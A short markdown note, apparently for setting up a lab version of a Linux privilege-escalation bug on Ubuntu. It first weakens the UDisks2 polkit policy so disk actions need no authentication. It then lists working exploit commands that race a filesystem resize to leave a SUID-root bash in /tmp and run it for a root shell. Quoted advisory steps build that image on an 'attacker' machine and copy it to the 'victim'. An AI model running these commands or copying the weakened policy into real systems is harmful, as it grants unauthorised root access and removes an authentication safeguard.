# Setup fake CVE-2025-6018 (For Ubuntu) 

```bash
sudo apt update
sudo apt install xfsprogs
```


```bash
sudo sed -i 's/<allow_any>auth_admin<\/allow_any>/<allow_any>yes<\/allow_any>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo sed -i 's/<allow_inactive>auth_admin<\/allow_inactive>/<allow_inactive>yes<\/allow_inactive>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo sed -i 's/<allow_active>auth_admin<\/allow_active>/<allow_active>yes<\/allow_active>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo systemctl restart polkit
```

```bash
udisksctl loop-setup --file ./xfs.image --no-user-interaction

while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &

gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

find /tmp | grep blockdev

mount

/tmp/blockdev*/bash -p
```


From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

```bash
1/ On our own attacker machine, as root, we create an XFS image that
contains a SUID-root shell, and copy it to the victim machine:

------------------------------------------------------------------------
attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300

attacker# mkfs.xfs ./xfs.image

attacker# mkdir ./xfs.mount

attacker# mount -t xfs ./xfs.image ./xfs.mount

attacker# cp /bin/bash ./xfs.mount

attacker# chmod 04555 ./xfs.mount/bash

attacker# umount ./xfs.mount

attacker# scp -i id_ed25519 ./xfs.image nobody@victim:
```